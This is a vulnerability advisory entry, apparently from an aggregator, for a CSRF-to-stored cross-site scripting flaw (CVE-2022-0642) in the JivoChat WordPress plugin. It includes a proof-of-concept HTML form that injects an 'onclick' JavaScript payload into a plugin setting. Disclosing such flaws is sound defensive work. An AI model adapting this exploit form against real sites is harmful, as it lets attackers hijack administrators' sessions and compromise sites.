Lucene search
Muhamad hidayatWPEX-ID:099CF9B4-0B3A-43C6-8CA9-7C2D50F86425HistoryMay 09, 2022 - 12:00 a.m.
JivoChat < 1.3.5.4 - Stored Cross-Site Scripting via CSRF
2022-05-0900:00:00
muhamad hidayat
117
jivochat
stored cross-site scripting
csrf
go to web application" exploit
EPSS
0.001
Percentile
21.2%
The plugin does not properly check CSRF tokens on POST requests to the plugins admin page, and does not sanitise some parameters, leading to a stored Cross-Site Scripting vulnerability where an attacker can trick a logged in administrator to inject arbitrary javascript.
<html>
<body>
<form method="POST" action="https://127.0.0.1/wordpress/wp-admin/admin.php?page=jivosite.php">
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="userPassword" value="Test123"/>
<input type="hidden" name="userDisplayName" value="test123"/>
<input type="hidden" name="languageList" value='1337" onclick=alert(/XSS/) test="'/>
<input type="submit" value="Submit">
</form>
</body>
<html>
XSS will be triggered when admin click "Go to Web Application"Related
wpvulndb
wpvulndb
JivoChat < 1.3.5.4 - Stored Cross-Site Scripting via CSRF
2022-05-09 00:00:00
cve
cve
CVE-2022-0642
2022-05-30 09:15:08
patchstack
patchstack
nvd
nvd
CVE-2022-0642
2022-05-30 09:15:08
prion
prion
Cross site scripting
2022-05-30 09:15:00
cvelist
cvelist
CVE-2022-0642 JivoChat < 1.3.5.4 - Stored Cross-Site Scripting via CSRF
2022-05-30 08:35:35